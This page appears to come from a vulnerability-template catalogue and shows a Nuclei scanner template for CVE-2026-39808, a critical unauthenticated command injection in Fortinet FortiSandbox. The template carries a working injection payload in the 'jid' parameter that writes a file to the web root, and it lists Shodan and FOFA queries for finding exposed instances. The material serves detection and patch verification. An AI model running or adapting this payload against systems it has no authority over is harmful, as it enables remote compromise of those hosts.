Fortinet FortiSandbox - Command Injection
CVE-2026-39808
Verified
Description
Fortinet FortiSandbox 4.4.0 through 4.4.8 contains a command injection caused by improper neutralization of special elements in OS commands, letting attackers execute unauthorized code or commands, exploit requires crafted input.
Severity
Critical
CVSS Score
9.8
Exploit Probability
49%
Affected Product
fortisandbox
Published Date
April 19, 2026
Template Author
dhiyaneshdk
CVE-2026-39808.yaml
id: CVE-2026-39808
info:
name: Fortinet FortiSandbox - Command Injection
author: DhiyaneshDk
severity: critical
description: |
Fortinet FortiSandbox 4.4.0 through 4.4.8 contains a command injection caused by improper neutralization of special elements in OS commands, letting attackers execute unauthorized code or commands, exploit requires crafted input.
impact: |
Attackers can execute arbitrary code or commands, potentially leading to full system compromise.
remediation: Upgrade FortiSandbox to version 4.4.9 or later.
reference:
- https://fortiguard.fortinet.com/psirt/FG-IR-26-100
- https://nvd.nist.gov/vuln/detail/CVE-2026-39808
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-39808
cwe-id: CWE-78
epss-score: 0.48668
epss-percentile: 0.98731
metadata:
verified: true
max-request: 2
vendor: fortinet
product: fortisandbox
shodan-query: http.title:"FortiSandbox"
fofa-query: title="FortiSandbox"
tags: cve,cve2026,fortisandbox,fortinet,rce,intrusive,file-upload,vkev
variables:
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+{{string}}+%3e+%2fweb%2fng%2f{{filename}}.txt%29%7c HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(body, 'fortisandbox')"
internal: true
- raw:
- |
GET /ng/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '{{string}}')"
condition: and
# digest: 4a0a00473045022014ea640f981cc976f8db6234b3e11269b8406c4e7c12d43d406bed850ad5662a022100d6b569bacc15ef23381f2d90702cbdf8b3a5f601a4d798a741d0beccd82501f5:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-39808
CWE ID:
cwe-78
Remediation Steps
Upgrade FortiSandbox to version 4.4.9 or later.